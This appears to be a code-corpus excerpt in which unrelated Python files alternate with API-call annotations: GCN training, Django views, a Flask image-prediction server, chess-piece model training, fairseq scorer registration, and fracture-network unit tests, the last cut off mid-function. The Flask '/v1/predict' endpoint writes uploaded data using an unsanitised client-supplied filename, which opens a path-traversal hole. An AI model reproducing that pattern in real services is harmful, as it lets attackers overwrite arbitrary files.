history_test_acc = []
input_edge_index = to_undirected(edge_index) if kwargs['undirected'] else edge_index
for i_epoch in range(0, num_epochs):
print(f'Epoch {i_epoch:>3} ', end='')
y_pred = model(x, input_edge_index)
train_acc = eval_acc(y_pred[train_mask], y[train_mask])
# Train
loss = F.cross_entropy(y_pred[train_mask], y[train_mask])
optimizer.zero_grad()
loss.backward()
optimizer.step()
# Test
test_acc = eval_acc(y_pred[test_mask], y[test_mask])
history_test_acc.append(test_acc)
print(f'Train Acc = {train_acc}. Test Acc = {test_acc}')
kwargs['best_acc'] = max(history_test_acc)
plt.plot(list(range(num_epochs)), history_test_acc, label=f'case_{str(i_case).zfill(2)}')
plt.legend()
plt.savefig(f'{data_name}-HistoryAcc.jpg')
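# Save each configuration together with its best test accuracy for side-by-side comparison.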
pd.DataFrame(test_cases).to_csv(f'{data_name}-Result.csv')
| [((15, 14, 15, 77), 'pandas.read_table', 'pd.read_table', (), '', True, 'import pandas as pd\n'), ((16, 11, 16, 67), 'pandas.read_table', 'pd.read_table', (), '', True, 'import pandas as pd\n'), ((41, 7, 41, 88), 'torch_geometric.data.Data', 'Data', (), '', False, 'from torch_geometric.data import Data\n'), ((140, 0, 140, 12), 'matplotlib.pyplot.legend', 'plt.legend', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((141, 0, 141, 42), 'matplotlib.pyplot.savefig', 'plt.savefig', ({(141, 12, 141, 41): 'f"""{data_name}-HistoryAcc.jpg"""'}, {}), "(f'{data_name}-HistoryAcc.jpg')", True, 'import matplotlib.pyplot as plt\n'), ((30, 17, 30, 51), 'torch.tensor', 'torch.tensor', ({(30, 30, 30, 50): '[False] * y.shape[0]'}, {}), '([False] * y.shape[0])', False, 'import torch\n'), ((36, 17, 36, 41), 'torch.tensor', 'torch.tensor', ({(36, 30, 36, 40): 'train_mask'}, {}), '(train_mask)', False, 'import torch\n'), ((46, 4, 46, 24), 'random.shuffle', 'random.shuffle', ({(46, 19, 46, 23): 'temp'}, {}), '(temp)', False, 'import random\n'), ((33, 8, 33, 28), 'random.shuffle', 'random.shuffle', ({(33, 23, 33, 27): 'temp'}, {}), '(temp)', False, 'import random\n'), ((67, 26, 67, 114), 'torch_geometric.nn.GCNConv', 'GCNConv', (), '', False, 'from torch_geometric.nn import GCNConv, PairNorm\n'), ((120, 23, 120, 48), 'torch_geometric.utils.undirected.to_undirected', 'to_undirected', ({(120, 37, 120, 47): 'edge_index'}, {}), '(edge_index)', False, 'from torch_geometric.utils.undirected import to_undirected\n'), ((128, 15, 128, 65), 'torch.nn.functional.cross_entropy', 'F.cross_entropy', ({(128, 31, 128, 49): 'y_pred[train_mask]', (128, 51, 128, 64): 'y[train_mask]'}, {}), '(y_pred[train_mask], y[train_mask])', True, 'import torch.nn.functional as F\n'), ((142, 0, 142, 24), 'pandas.DataFrame', 'pd.DataFrame', ({(142, 13, 142, 23): 'test_cases'}, {}), '(test_cases)', True, 'import pandas as pd\n'), ((31, 13, 31, 28), 'torch.unique', 'torch.unique', ({(31, 26, 31, 27): 'y'}, {}), '(y)', False, 'import torch\n'), ((71, 28, 71, 38), 'torch_geometric.nn.PairNorm', 'PairNorm', ({}, {}), '()', False, 'from torch_geometric.nn import GCNConv, PairNorm\n'), ((73, 103, 73, 126), 'torch.nn.LeakyReLU', 'torch.nn.LeakyReLU', ({(73, 122, 73, 125): '(0.1)'}, {}), '(0.1)', False, 'import torch\n'), ((32, 15, 32, 42), 'torch.arange', 'torch.arange', ({(32, 28, 32, 29): '0', (32, 31, 32, 41): 'y.shape[0]'}, {}), '(0, y.shape[0])', False, 'import torch\n'), ((64, 13, 64, 102), 'torch_geometric.nn.GCNConv', 'GCNConv', (), '', False, 'from torch_geometric.nn import GCNConv, PairNorm\n'), ((65, 15, 65, 102), 'torch_geometric.nn.GCNConv', 'GCNConv', (), '', False, 'from torch_geometric.nn import GCNConv, PairNorm\n'), ((88, 13, 88, 41), 'torch.argmax', 'torch.argmax', (), '', False, 'import torch\n')] |
ESG-Leipzig/Homepage-2015 | esg_leipzig_homepage_2015/views.py | 6b77451881031dcb640d2e61ce862617d634f9ac | import datetime
import json
from django.conf import settings
from django.http import Http404
from django.utils import timezone
from django.views import generic
from .models import Event, FlatPage, News
class HomeView(generic.ListView):
"""
View for the first page called 'Home'.
"""
context_object_name = 'event_list'
model = Event
template_name = 'home.html'
def get_queryset(self):
"""
Returns a queryset of all future events that should appear on home.
Uses settings.EVENT_DELAY_IN_MINUTES to determine the range.
"""
time_to_hide = timezone.now() - datetime.timedelta(
minutes=settings.EVENT_DELAY_IN_MINUTES)
queryset = super().get_queryset().filter(begin__gte=time_to_hide)
result = []
for event in queryset:
time_to_show = timezone.now() + datetime.timedelta(
days=event.on_home_before_begin)
if event.on_home_before_begin > 0 and event.begin <= time_to_show:
result.append(event)
return result
def get_context_data(self, **context):
"""
Adds all news to the context.
"""
news_list = News.objects.all()
return super().get_context_data(news_list=news_list, **context)
class CalendarView(generic.ListView):
"""
View for a calendar with all events.
"""
model = Event
template_name = 'calendar.html'
def get_context_data(self, **context):
"""
Returns the template context. Adds event data as JSON for use in
Javascript calendar.
"""
context = super().get_context_data(**context)
event_list = []
for event in context['event_list']:
event_dict = {
'title': event.title,
'start': event.begin.isoformat(),
'description': event.content,
'className': event.css_class_name}
if event.duration:
event_dict['end'] = event.end.isoformat()
event_list.append(event_dict)
context['event_list_json'] = json.dumps(event_list)
return context
class FlatPageView(generic.DetailView):
"""
View for static pages.
"""
model = FlatPage
def get_object(self, queryset=None):
"""
        Returns the flatpage instance. Raises Http404 if it does not exist.
"""
queryset = queryset or self.get_queryset()
url = self.kwargs.get('url')
for flatpage in queryset.filter(slug=url.split('/')[-1]):
if flatpage.get_absolute_url().strip('/') == url:
obj = flatpage
break
else:
raise Http404
return obj
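    # Note on get_object above: candidates are narrowed by the last slug segment of
    # 'url', and the flatpage whose full get_absolute_url() matches the requested path
    # (ignoring surrounding slashes) is returned; e.g. a hypothetical url 'gruppen/chor'
    # resolves to the flatpage served at '/gruppen/chor/'.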
def get_template_names(self):
"""
Returns the template names for the view as list. The name
'flatpage_default.html' is always appended.
"""
template_names = []
if self.object.template_name:
template_names.append(self.object.template_name)
template_names.append('flatpage_default.html')
return template_names
def get_context_data(self, **context):
"""
        Returns the template context. Adds breadcrumb to it if necessary.
"""
context = super().get_context_data(**context)
parent = context['flatpage'].parent
if parent is None:
breadcrumb_list = []
else:
breadcrumb_list = [context['flatpage']]
while parent is not None:
breadcrumb_list.append(parent)
parent = parent.parent
breadcrumb_list.reverse()
context['breadcrumb_list'] = breadcrumb_list
return context
| [((67, 37, 67, 59), 'json.dumps', 'json.dumps', ({(67, 48, 67, 58): 'event_list'}, {}), '(event_list)', False, 'import json\n'), ((25, 23, 25, 37), 'django.utils.timezone.now', 'timezone.now', ({}, {}), '()', False, 'from django.utils import timezone\n'), ((25, 40, 26, 52), 'datetime.timedelta', 'datetime.timedelta', (), '', False, 'import datetime\n'), ((30, 27, 30, 41), 'django.utils.timezone.now', 'timezone.now', ({}, {}), '()', False, 'from django.utils import timezone\n'), ((30, 44, 31, 48), 'datetime.timedelta', 'datetime.timedelta', (), '', False, 'import datetime\n')] |
ronniechong/tensorflow-trainer | train.py | 79e58d224ce1e5ae687abee2bfd81deb49bd41dd | from dotenv import load_dotenv
load_dotenv()
from flask import Flask, flash, request, redirect, url_for
from flask_ngrok import run_with_ngrok
from flask_cors import CORS
from werkzeug.utils import secure_filename
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras.applications import vgg16
from tensorflow.keras import layers, models, Model, optimizers
from tensorflow.keras.preprocessing import image
import numpy as np
import os
import base64
ALLOWED_EXTENSIONS = {'txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'}
app = Flask(__name__)
app.secret_key = os.getenv('SECRETKEY')
CORS(app)
# run_with_ngrok(app)
# https://github.com/gstaff/flask-ngrok/issues/2
category_names = os.getenv('CATEGORIES').split(',')
nb_categories = len(category_names)
# Read the run mode from the environment; avoid shadowing the built-in type().
mode = os.getenv('MODE')
if mode == 'checkpoint':
# Load via checkpoints
img_height, img_width = 200,200
conv_base = vgg16.VGG16(weights='imagenet', include_top=False, pooling='max', input_shape = (img_width, img_height, 3))
  # Build the classification head; use a separate name so the imported `layers`
  # module is not rebound.
  head_layers = [
    conv_base,
    layers.Dense(nb_categories, activation='softmax')
  ]
  model = models.Sequential(head_layers)
model.load_weights('./model/cp2-0010.ckpt')
else:
# Load saved model
model = models.load_model('./model/model_vgg16.h5')
def allowed_file(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS
@app.route('/')
def home():
return 'Nothing to see here'
@app.route('/v2/predict', methods=['POST'])
def predictFileUpload():
if request.method == 'POST':
print(request)
if 'file' not in request.files:
return {
'Error': 'No file part'
}
file = request.files['file']
if file.filename == '':
return {
'Error': 'No selected file'
}
if file and allowed_file(file.filename):
filename = secure_filename(file.filename)
file.save(os.path.join('./uploads', filename))
img_width, img_height = 200, 200
img = image.load_img(os.path.join('./uploads', filename), target_size = (img_width, img_height))
img = image.img_to_array(img)
img = np.expand_dims(img, axis = 0)
class_prob=model.predict(img)
y_pred = np.argmax(class_prob, axis=1)
count = 0
for a in class_prob[0]:
# print(category_names[count] + ': ' + "{:.2f}".format(a))
count = count + 1
return {
'filename': filename,
'prediction': category_names[y_pred[0]]
}
return 'nothing to see here'
@app.route('/v1/predict', methods=['POST'])
def predictBase64():
if request.method == 'POST':
data = request.get_json()
if data is None:
return {
'Error': 'No image'
}
else:
img_data = data['image']
filename = data['name']
with open(os.path.join('./uploads', filename), "wb") as fh:
fh.write(base64.decodebytes(img_data.encode()))
# fh.close()
img_width, img_height = 200, 200
img = image.load_img(os.path.join('./uploads', filename), target_size = (img_width, img_height))
img = image.img_to_array(img)
img = np.expand_dims(img, axis = 0)
class_prob=model.predict(img)
y_pred = np.argmax(class_prob, axis=1)
      count = 0
for a in class_prob[0]:
# print(category_names[count] + ': ' + "{:.2f}".format(a))
count = count + 1
return {
'filename': filename,
'prediction': category_names[y_pred[0]]
}
return 'nothing to see here'
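# Example client calls for the two endpoints above (host, port and file name are
# assumptions; the default Flask port is used):
#   import requests, base64
#   requests.post('http://localhost:5000/v2/predict',
#                 files={'file': open('board.jpg', 'rb')})
#   requests.post('http://localhost:5000/v1/predict',
#                 json={'name': 'board.jpg',
#                       'image': base64.b64encode(open('board.jpg', 'rb').read()).decode()})
# Both return the stored filename and the predicted category name.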
if __name__ == '__main__':
app.run(host='0.0.0.0') | [((2, 0, 2, 13), 'dotenv.load_dotenv', 'load_dotenv', ({}, {}), '()', False, 'from dotenv import load_dotenv\n'), ((21, 6, 21, 21), 'flask.Flask', 'Flask', ({(21, 12, 21, 20): '__name__'}, {}), '(__name__)', False, 'from flask import Flask, flash, request, redirect, url_for\n'), ((22, 17, 22, 39), 'os.getenv', 'os.getenv', ({(22, 27, 22, 38): '"""SECRETKEY"""'}, {}), "('SECRETKEY')", False, 'import os\n'), ((23, 0, 23, 9), 'flask_cors.CORS', 'CORS', ({(23, 5, 23, 8): 'app'}, {}), '(app)', False, 'from flask_cors import CORS\n'), ((29, 7, 29, 24), 'os.getenv', 'os.getenv', ({(29, 17, 29, 23): '"""MODE"""'}, {}), "('MODE')", False, 'import os\n'), ((34, 14, 34, 121), 'tensorflow.keras.applications.vgg16.VGG16', 'vgg16.VGG16', (), '', False, 'from tensorflow.keras.applications import vgg16\n'), ((39, 10, 39, 35), 'tensorflow.keras.models.Sequential', 'models.Sequential', ({(39, 28, 39, 34): 'layers'}, {}), '(layers)', False, 'from tensorflow.keras import layers, models, Model, optimizers\n'), ((43, 10, 43, 53), 'tensorflow.keras.models.load_model', 'models.load_model', ({(43, 28, 43, 52): '"""./model/model_vgg16.h5"""'}, {}), "('./model/model_vgg16.h5')", False, 'from tensorflow.keras import layers, models, Model, optimizers\n'), ((26, 17, 26, 40), 'os.getenv', 'os.getenv', ({(26, 27, 26, 39): '"""CATEGORIES"""'}, {}), "('CATEGORIES')", False, 'import os\n'), ((37, 4, 37, 53), 'tensorflow.keras.layers.Dense', 'layers.Dense', (), '', False, 'from tensorflow.keras import layers, models, Model, optimizers\n'), ((90, 11, 90, 29), 'flask.request.get_json', 'request.get_json', ({}, {}), '()', False, 'from flask import Flask, flash, request, redirect, url_for\n'), ((105, 10, 105, 33), 'tensorflow.keras.preprocessing.image.img_to_array', 'image.img_to_array', ({(105, 29, 105, 32): 'img'}, {}), '(img)', False, 'from tensorflow.keras.preprocessing import image\n'), ((106, 10, 106, 39), 'numpy.expand_dims', 'np.expand_dims', (), '', True, 'import numpy as np\n'), ((109, 13, 109, 42), 'numpy.argmax', 'np.argmax', (), '', True, 'import numpy as np\n'), ((67, 17, 67, 47), 'werkzeug.utils.secure_filename', 'secure_filename', ({(67, 33, 67, 46): 'file.filename'}, {}), '(file.filename)', False, 'from werkzeug.utils import secure_filename\n'), ((72, 12, 72, 35), 'tensorflow.keras.preprocessing.image.img_to_array', 'image.img_to_array', ({(72, 31, 72, 34): 'img'}, {}), '(img)', False, 'from tensorflow.keras.preprocessing import image\n'), ((73, 12, 73, 41), 'numpy.expand_dims', 'np.expand_dims', (), '', True, 'import numpy as np\n'), ((76, 15, 76, 44), 'numpy.argmax', 'np.argmax', (), '', True, 'import numpy as np\n'), ((104, 25, 104, 60), 'os.path.join', 'os.path.join', ({(104, 38, 104, 49): '"""./uploads"""', (104, 51, 104, 59): 'filename'}, {}), "('./uploads', filename)", False, 'import os\n'), ((68, 16, 68, 51), 'os.path.join', 'os.path.join', ({(68, 29, 68, 40): '"""./uploads"""', (68, 42, 68, 50): 'filename'}, {}), "('./uploads', filename)", False, 'import os\n'), ((71, 27, 71, 62), 'os.path.join', 'os.path.join', ({(71, 40, 71, 51): '"""./uploads"""', (71, 53, 71, 61): 'filename'}, {}), "('./uploads', filename)", False, 'import os\n'), ((99, 14, 99, 49), 'os.path.join', 'os.path.join', ({(99, 27, 99, 38): '"""./uploads"""', (99, 40, 99, 48): 'filename'}, {}), "('./uploads', filename)", False, 'import os\n')] |
sandorfoldi/chess_positions_recognition | src/models/train_model.py | b051f5ba066876d54c435d96cf7e339dfc369b3b | import random
import matplotlib.pyplot as plt
import wandb
import hydra
import torch
import torch.utils.data as data_utils
from model import ChessPiecePredictor
from torch import nn, optim
from google.cloud import storage
from torch.utils.data import DataLoader
from torchvision import transforms
from torchvision.datasets import ImageFolder
@hydra.main(config_path="../conf", config_name="config")
def train(cfg):
print(f"Training started with parameters: {cfg}")
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
wandb.init()
torch.manual_seed(cfg.seed)
model = ChessPiecePredictor(
image_size=cfg.image_size,
patch_size=cfg.patch_size,
in_channels=cfg.in_channels,
embed_dim=cfg.embed_dim,
num_heads=cfg.num_heads,
)
    model = model.to(device)  # keep the model on the same device as the input batches
    wandb.watch(model)
t = transforms.Compose(
[
transforms.Resize((cfg.image_size, cfg.image_size)),
transforms.Grayscale(num_output_channels=cfg.in_channels),
transforms.ToTensor(),
]
)
train_data = ImageFolder(f"{cfg.data_path}/train", transform=t)
validation_data = ImageFolder(f"{cfg.data_path}/test", transform=t)
indices_train = random.sample(range(1, 60000), 5000)
indices_valid = random.sample(range(1, 30000), 1000)
train_data = data_utils.Subset(train_data, indices_train)
validation_data = data_utils.Subset(validation_data, indices_valid)
train_loader = DataLoader(train_data, batch_size=cfg.batch_size, shuffle=True)
validation_loader = DataLoader(validation_data, batch_size=cfg.batch_size, shuffle=True)
criterion = nn.CrossEntropyLoss()
optimizer = optim.Adam(model.parameters(), lr=cfg.lr)
print("Training started...")
train_losses = []
validation_losses = []
batch_count = len(train_loader)
epochs = 2
for e in range(epochs):
train_loss = 0
train_correct = 0
validation_loss = 0
validation_correct = 0
i = 0
for images, labels in train_loader:
# in case we use cuda to train on gpu
images = images.to(device)
labels = labels.to(device)
optimizer.zero_grad()
preds = model(images)
loss = criterion(preds, labels)
loss.backward()
optimizer.step()
train_loss += loss.item()
# accuracy
_, preds_indices = torch.max(preds, dim=1)
train_correct += (preds_indices == labels).sum()
i += 1
if i % 100 == 0:
print(
f"Epoch: {e+1} / {epochs}"
f" - progress: {i} / {batch_count}"
f" - loss: {loss.data.mean()}"
)
for images, labels in validation_loader:
images = images.to(device)
labels = labels.to(device)
preds = model(images)
loss = criterion(preds, labels)
validation_loss += loss.item()
# accuracy
_, preds_indices = torch.max(preds, dim=1)
validation_correct += (preds_indices == labels).sum()
train_accuracy = float(train_correct / (len(train_loader) * cfg.batch_size))
validation_accuracy = float(validation_correct / (len(validation_loader) * cfg.batch_size))
wandb.log({
"train_loss": train_loss,
"validation_loss": validation_loss,
"train_accuracy": train_accuracy,
"validation_accuracy": validation_accuracy,
})
train_losses.append(train_loss / len(train_loader))
validation_losses.append(validation_loss / len(validation_loader))
# plotting
plt.plot(list(range(1, len(train_losses) + 1)), train_losses, label="Training loss")
print("Train losses:", train_losses)
plt.plot(list(range(1, len(validation_losses) + 1)), validation_losses, label="Validation loss")
print("Validation losses:", validation_losses)
plt.xlabel("epoch")
plt.ylabel("loss")
plt.legend()
fig_path = "training_run.png"
plt.savefig(fig_path)
print(f"Saved training loss figure to {fig_path}")
model_path = "trained_model.pth"
torch.save(model.state_dict(), model_path)
print(f"Saved trained model to {model_path}")
storage_client = storage.Client()
bucket = storage_client.bucket("chess_predictor")
blob = bucket.blob("model_blob")
    blob.upload_from_filename(model_path)  # upload the checkpoint that was just saved
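# A minimal sketch of the Hydra config this entry point expects. The field names are
# taken from the cfg.* accesses above; the values are illustrative assumptions only.
#
#   # conf/config.yaml
#   seed: 0
#   lr: 1.0e-3
#   batch_size: 64
#   image_size: 32
#   patch_size: 8
#   in_channels: 1
#   embed_dim: 64
#   num_heads: 4
#   data_path: /path/to/chess/data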
if __name__ == "__main__":
train()
| [((16, 1, 16, 56), 'hydra.main', 'hydra.main', (), '', False, 'import hydra\n'), ((22, 4, 22, 16), 'wandb.init', 'wandb.init', ({}, {}), '()', False, 'import wandb\n'), ((24, 4, 24, 31), 'torch.manual_seed', 'torch.manual_seed', ({(24, 22, 24, 30): 'cfg.seed'}, {}), '(cfg.seed)', False, 'import torch\n'), ((26, 12, 32, 5), 'model.ChessPiecePredictor', 'ChessPiecePredictor', (), '', False, 'from model import ChessPiecePredictor\n'), ((33, 4, 33, 22), 'wandb.watch', 'wandb.watch', ({(33, 16, 33, 21): 'model'}, {}), '(model)', False, 'import wandb\n'), ((43, 17, 43, 67), 'torchvision.datasets.ImageFolder', 'ImageFolder', (), '', False, 'from torchvision.datasets import ImageFolder\n'), ((44, 22, 44, 71), 'torchvision.datasets.ImageFolder', 'ImageFolder', (), '', False, 'from torchvision.datasets import ImageFolder\n'), ((50, 17, 50, 61), 'torch.utils.data.Subset', 'data_utils.Subset', ({(50, 35, 50, 45): 'train_data', (50, 47, 50, 60): 'indices_train'}, {}), '(train_data, indices_train)', True, 'import torch.utils.data as data_utils\n'), ((51, 22, 51, 71), 'torch.utils.data.Subset', 'data_utils.Subset', ({(51, 40, 51, 55): 'validation_data', (51, 57, 51, 70): 'indices_valid'}, {}), '(validation_data, indices_valid)', True, 'import torch.utils.data as data_utils\n'), ((53, 19, 53, 82), 'torch.utils.data.DataLoader', 'DataLoader', (), '', False, 'from torch.utils.data import DataLoader\n'), ((54, 24, 54, 92), 'torch.utils.data.DataLoader', 'DataLoader', (), '', False, 'from torch.utils.data import DataLoader\n'), ((56, 16, 56, 37), 'torch.nn.CrossEntropyLoss', 'nn.CrossEntropyLoss', ({}, {}), '()', False, 'from torch import nn, optim\n'), ((131, 4, 131, 23), 'matplotlib.pyplot.xlabel', 'plt.xlabel', ({(131, 15, 131, 22): '"""epoch"""'}, {}), "('epoch')", True, 'import matplotlib.pyplot as plt\n'), ((132, 4, 132, 22), 'matplotlib.pyplot.ylabel', 'plt.ylabel', ({(132, 15, 132, 21): '"""loss"""'}, {}), "('loss')", True, 'import matplotlib.pyplot as plt\n'), ((133, 4, 133, 16), 'matplotlib.pyplot.legend', 'plt.legend', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((136, 4, 136, 25), 'matplotlib.pyplot.savefig', 'plt.savefig', ({(136, 16, 136, 24): 'fig_path'}, {}), '(fig_path)', True, 'import matplotlib.pyplot as plt\n'), ((143, 21, 143, 37), 'google.cloud.storage.Client', 'storage.Client', ({}, {}), '()', False, 'from google.cloud import storage\n'), ((114, 8, 119, 10), 'wandb.log', 'wandb.log', ({(114, 18, 119, 9): "{'train_loss': train_loss, 'validation_loss': validation_loss,\n 'train_accuracy': train_accuracy, 'validation_accuracy':\n validation_accuracy}"}, {}), "({'train_loss': train_loss, 'validation_loss': validation_loss,\n 'train_accuracy': train_accuracy, 'validation_accuracy':\n validation_accuracy})", False, 'import wandb\n'), ((20, 36, 20, 61), 'torch.cuda.is_available', 'torch.cuda.is_available', ({}, {}), '()', False, 'import torch\n'), ((37, 12, 37, 63), 'torchvision.transforms.Resize', 'transforms.Resize', ({(37, 30, 37, 62): '(cfg.image_size, cfg.image_size)'}, {}), '((cfg.image_size, cfg.image_size))', False, 'from torchvision import transforms\n'), ((38, 12, 38, 69), 'torchvision.transforms.Grayscale', 'transforms.Grayscale', (), '', False, 'from torchvision import transforms\n'), ((39, 12, 39, 33), 'torchvision.transforms.ToTensor', 'transforms.ToTensor', ({}, {}), '()', False, 'from torchvision import transforms\n'), ((87, 31, 87, 54), 'torch.max', 'torch.max', (), '', False, 'import torch\n'), ((108, 31, 108, 54), 'torch.max', 'torch.max', (), '', False, 
'import torch\n')] |
fairseq-FT/fairseq | fairseq/scoring/__init__.py | 18725499144c1bba7c151b796ba774e59d36eaa9 | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import importlib
import os
from abc import ABC, abstractmethod
from fairseq import registry
from omegaconf import DictConfig
class BaseScorer(ABC):
def __init__(self, cfg):
self.cfg = cfg
self.ref = []
self.pred = []
def add_string(self, ref, pred):
self.ref.append(ref)
self.pred.append(pred)
@abstractmethod
def score(self) -> float:
pass
@abstractmethod
def result_string(self) -> str:
pass
_build_scorer, register_scorer, SCORER_REGISTRY, _ = registry.setup_registry(
"--scoring", default="bleu"
)
def build_scorer(choice, tgt_dict):
if isinstance(choice, DictConfig):
choice = choice._name
if choice == "bleu":
from fairseq.scoring import bleu
return bleu.Scorer(
bleu.BleuConfig(pad=tgt_dict.pad(), eos=tgt_dict.eos(), unk=tgt_dict.unk())
)
return _build_scorer(choice)
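# Sketch of how a new scorer would plug into the registry above (name and metric are
# hypothetical; real scorers can also declare a config dataclass):
#
#   @register_scorer("char_count")
#   class CharCountScorer(BaseScorer):
#       def score(self) -> float:
#           return sum(len(p) for p in self.pred)
#
#       def result_string(self) -> str:
#           return f"char_count: {self.score()}"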
# automatically import any Python files in the current directory
for file in os.listdir(os.path.dirname(__file__)):
if file.endswith(".py") and not file.startswith("_"):
module = file[: file.find(".py")]
importlib.import_module("fairseq.scoring." + module)
| [((34, 53, 36, 1), 'fairseq.registry.setup_registry', 'registry.setup_registry', (), '', False, 'from fairseq import registry\n'), ((53, 23, 53, 48), 'os.path.dirname', 'os.path.dirname', ({(53, 39, 53, 47): '__file__'}, {}), '(__file__)', False, 'import os\n'), ((56, 8, 56, 60), 'importlib.import_module', 'importlib.import_module', ({(56, 32, 56, 59): "('fairseq.scoring.' + module)"}, {}), "('fairseq.scoring.' + module)", False, 'import importlib\n')] |
richardhaslam/discrete-fracture-network | dfn/tests/test_FractureNetworkThermal.py | 2a235fdd3aedfb80dbd9f441d07c5713a6d6c74f | import copy
import unittest
import networkx as nx
import numpy as np
from scipy.special import erf
from dfn import Fluid, FractureNetworkThermal
class TestFractureNetworkThermal(unittest.TestCase):
def __init__(self, *args, **kwargs):
super(TestFractureNetworkThermal, self).__init__(*args, **kwargs)
# fluid properties
cp_w = 4300.0
rho_w = 1000.0
mu_w = 1E-3
self.fluid = Fluid(density=rho_w, viscosity=mu_w, heat_capacity=cp_w)
# reservoir properties
k_r = 2.9
cp_r = 1050.0
rho_r = 2700.0
alpha_r = k_r / (rho_r * cp_r)
# first network
conn_1 = [(0, 1), (1, 2), (1, 3), (2, 4), (3, 4), (4, 5)]
L_1 = [100, 500, 500, 500, 500, 100]
H_1 = [500, 500, 500, 500, 500, 500]
w_1 = [1E-3, 1E-3, 1E-3, 1E-3, 1E-3, 1E-3]
self.network_1 = FractureNetworkThermal(conn_1, L_1, H_1, w_1, k_r,
alpha_r)
# second network
conn_2 = [(0, 1), (1, 2), (2, 3), (1, 4), (2, 5), (3, 6), (4, 5),
(5, 6), (4, 7), (5, 8), (6, 9), (7, 8), (8, 9), (9, 10)]
L_2 = 250 * np.ones(len(conn_2))
L_2[0] = 100
L_2[-1] = 100
H_2 = 500 * np.ones(len(conn_2))
w_2 = 1E-3 * np.ones(len(conn_2))
self.network_2 = FractureNetworkThermal(conn_2, L_2, H_2, w_2, k_r,
alpha_r)
def copy_networks(self):
"""Return a copy of the fracture networks."""
return copy.copy(self.network_1), copy.copy(self.network_2)
def networks_with_flow(self):
"""Return networks with the mass flow calculated."""
network_1, network_2 = self.copy_networks()
P_0 = 0.0
m_inj = 50.0
network_1.calculate_flow(self.fluid, {0: P_0}, {5: -m_inj})
network_2.calculate_flow(self.fluid, {0: P_0}, {10: -m_inj})
return network_1, network_2
def reverse_nodes(self, network, segments):
"""Reverse the node order for given segments."""
conn = network.connectivity
for seg in segments:
inlet, outlet = conn[seg]
conn[seg, :] = outlet, inlet
network.connectivity = conn
return network
def test_no_mass_flow(self):
"""Test if TypeError is raised for networks without flow calculated."""
with self.assertRaises(TypeError):
self.network_1._check_if_calculated()
with self.assertRaises(TypeError):
self.network_2._check_if_calculated()
def test_neg_mass_flow(self):
"""Test if valueError is raised for networks with negative flow."""
network_1, network_2 = self.networks_with_flow()
network_1 = self.reverse_nodes(network_1, [1])
network_2 = self.reverse_nodes(network_2, [1])
network_1.calculate_flow(self.fluid, {0: 0}, {5: -1.0})
network_2.calculate_flow(self.fluid, {0: 0}, {10: -1.0})
with self.assertRaises(ValueError):
network_1.calculate_temperature(self.fluid, 0, [0], [1])
with self.assertRaises(ValueError):
network_2.calculate_temperature(self.fluid, 0, [0], [1])
def test_construct_graph(self):
"""Test _construct_graph method."""
network_1, network_2 = self.networks_with_flow()
network_1._construct_graph()
network_2._construct_graph()
# construct graph for network 1
G_1 = nx.MultiDiGraph()
edge_data_1 = [(0, 1, {'index': 0}), (1, 2, {'index': 1}),
(1, 3, {'index': 2}), (2, 4, {'index': 3}),
(3, 4, {'index': 4}), (4, 5, {'index': 5})]
G_1.add_edges_from(edge_data_1)
# construct graph for network 2
G_2 = nx.MultiDiGraph()
edge_data_2 = [(0, 1, {'index': 0}), (1, 2, {'index': 1}),
(2, 3, {'index': 2}), (1, 4, {'index': 3}),
(2, 5, {'index': 4}), (3, 6, {'index': 5}),
(4, 5, {'index': 6}), (5, 6, {'index': 7}),
(4, 7, {'index': 8}), (5, 8, {'index': 9}),
(6, 9, {'index': 10}), (7, 8, {'index': 11}),
(8, 9, {'index': 12}), (9, 10, {'index': 13})]
G_2.add_edges_from(edge_data_2)
# return True if graphs are the same
is_isomorphic_1 = nx.is_isomorphic(network_1.graph, G_1)
is_isomorphic_2 = nx.is_isomorphic(network_2.graph, G_2)
self.assertTrue(is_isomorphic_1)
self.assertTrue(is_isomorphic_2)
def test_find_injection_nodes(self):
"""Test _find_injection_nodes method."""
network_1, network_2 = self.networks_with_flow()
network_1._construct_graph()
network_2._construct_graph()
self.assertEqual(network_1._find_injection_nodes(), [0])
self.assertEqual(network_2._find_injection_nodes(), [0])
def test_mass_contribution(self):
"""Test _mass_contribution method."""
network_1, network_2 = self.networks_with_flow()
chi_1 = network_1._mass_contribution()
chi_2 = network_2._mass_contribution()
# first network
for i in (0, 1, 2, 5):
self.assertAlmostEqual(chi_1[i], 1.0, 12)
self.assertAlmostEqual(chi_1[3] + chi_1[4], 1.0, 12)
# second network
for i in (0, 1, 2, 3, 8, 13):
self.assertAlmostEqual(chi_2[i], 1.0, 12)
for i, j in [(4, 6), (5, 7), (9, 11), (10, 12)]:
self.assertAlmostEqual(chi_2[i] + chi_2[j], 1.0, 12)
def test_find_paths(self):
"""Test find_paths method."""
# .find_paths method calls .construct_graph if needed. Manually call
# .construct_graph() on one network for testing both True and False
# conditions
network_1, network_2 = self.networks_with_flow()
network_1._construct_graph()
path_1 = {(0, 1, 3), (0, 2, 4)}
path_2 = {(0, 1, 2, 5, 10), (0, 1, 4, 7, 10), (0, 3, 6, 7, 10),
(0, 3, 6, 9, 12), (0, 3, 8, 11, 12), (0, 1, 4, 9, 12)}
self.assertEqual(path_1, set(network_1.find_paths(0, 4)))
self.assertEqual(path_2, set(network_2.find_paths(0, 9)))
def test_calculate_temperature_inlet_segment(self):
"""Test calculate_temperature ability to handle the inlet segment."""
# operational parameters for temperature
t_end = 86400 * 365.25 * 20
time = t_end * np.linspace(1.0 / 100, 1.0, 100)
distance = np.linspace(0.0, 100.0, 100)
z, t = np.meshgrid(distance, time)
network_1, network_2 = self.networks_with_flow()
# create parameters for temperature manually
m_1 = network_1.mass_flow[0]
m_2 = network_2.mass_flow[0]
beta_1 = 2 * network_1.thermal_cond * network_1.thickness[0] / \
(m_1 * network_1.fluid.c_f)
beta_2 = 2 * network_2.thermal_cond * network_2.thickness[0] / \
(m_2 * network_2.fluid.c_f)
xi_1 = beta_1 * z / (2 * np.sqrt(network_1.thermal_diff * t))
xi_2 = beta_2 * z / (2 * np.sqrt(network_2.thermal_diff * t))
Theta_1 = erf(xi_1)
